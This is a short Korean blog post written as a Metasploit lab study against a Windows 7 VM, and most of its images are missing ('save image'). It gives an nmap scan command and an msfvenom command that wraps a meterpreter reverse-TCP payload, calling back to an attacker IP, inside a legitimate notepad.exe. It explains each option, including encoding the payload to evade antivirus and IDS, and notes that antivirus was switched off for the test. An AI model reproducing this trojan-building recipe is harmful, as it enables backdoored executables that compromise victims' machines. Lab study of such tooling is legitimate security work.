kkamagi's story

IT, 정보보안, 포렌식, 일상 공유

Cyber Security

Metasploit을 활용한 Windows 7 취약점 스터디

까마기 2017. 5. 31. 16:45
728x90
반응형

1. 포트 스캔


#msfconsole


msf > db_nmap  -sS -Pn -A -p 1-500 x.x.x.x


save image


msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.2 -f exe -x /mnt/notepad.exe -k -e x86/shikata_ga_nai -i 3 -o /mnt/notepad_mal.exe

save image

* msfvenom 옵션

a : 타겟 시스템의 아키텍쳐

--platform : 타겟 시스템의 플랫폼 ex) --platform windows

p : 적용할 페이로드 선택

lhost : 상대목표시스템에서 접속할 공격자의 IP주소 입력

f : 만들 파일 포맷을 정한다.

x : 쉘 코드를 넣을 템플릿 파일(악성 코드를 넣을 원본 파일 지정)

k : 원본 파일의 원래 기능을 유지

e : 백신이나 IDS 탐지를 피할 인코더를 선택, 선택한 인코더의 적용 횟수를 -i로 지정

o : 최종으로 만들어질 파일의 경로와 파일명 지정


save image-> V3에서 탐지되어 차단 -> 테스트를 위해 V3 일시적으로 Off


save image

-> Win7 Vm에 notepad_mal.exe 이동 및 파일 크기 비교

-> 쉘 코드와 인코딩 작업을 한 만큼 파일 크기가 커진 것이며, 작업을 위한 페이로드 작성이 끝난 것이다. 


save image

-> exploit 명령을 내린 후 세션 연결을 대기 중인 콘솔 화면




-> Win7 VM에서 실행하였으나 연결안됨

save image


*대상 파일없이 일반 exe로 페이로드를 다시 생성

save image


save image


save image


save image


save image

반응형